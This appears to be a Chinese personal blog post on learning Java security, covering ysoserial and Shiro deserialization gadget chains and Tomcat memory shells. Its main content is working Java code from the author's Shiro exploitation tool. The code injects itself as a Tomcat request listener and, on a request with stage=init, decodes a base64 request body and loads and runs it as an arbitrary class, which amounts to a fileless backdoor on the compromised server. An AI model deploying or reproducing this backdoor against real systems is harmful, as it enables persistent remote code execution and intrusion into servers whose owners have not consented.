JAVA安全从零单排

大部分都是写在notion上的,看看之后要不要迁移过了

JAVA基础知识

一些类文件结构,类加载机制,动态代理和注解的实现之类的,之后整理一下再补充吧

YSOSerial利用链学习

https://www.notion.so/YSoSerial-c459fbe2a6db4da2aacef352c048c502

Shiro反序列化利用链

自己照着自己的思路写的,和CommonsCollectionsK1的区别是没有用invokerTransformer,换成了InstantiateTransformer

https://www.notion.so/Shiro-e0b845980c8444ad946925b602a42d1d

Tomcat回显利用链

https://www.notion.so/Tomcat-8ebb706db1ee47ec94052b42f24a9027

Tomcat内存马

待整理

shiro反序列化利用工具

核心逻辑为实现一个Listener同时继承AbstractTranslet类并且实现ServletRequestListener接口来加载任意类并调用方法

public class Init extends AbstractTranslet implements ServletRequestListener  {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
    public Init() throws Exception {
        super();
        super.namesArray = new String[]{"ccdr4gon"};
        WebappClassLoaderBase webappClassLoaderBase =(WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();
        standardCtx.addApplicationEventListener(this);
    }

    @Override
    public void requestDestroyed(ServletRequestEvent sre) {}
    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        try {
            RequestFacade requestfacade= (RequestFacade) sre.getServletRequest();
            Field field = requestfacade.getClass().getDeclaredField("request");
            field.setAccessible(true);
            Request request = (Request) field.get(requestfacade);
            if (request.getParameter("stage").equals("init")) {
                StringBuilder sb = new StringBuilder("");
                BufferedReader br = request.getReader();
                String str;
                while ((str = br.readLine()) != null) {
                    sb.append(str);
                }
                byte[] payload = Base64.getDecoder().decode(sb.toString());
                Method defineClass = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                defineClass.setAccessible(true);
                Class clazz = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), payload, 0, payload.length);
                clazz.newInstance();
            }
        }catch (Exception ignored){ }
    }
}

ccdr4gon/Dr4gonSword (github.com)

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注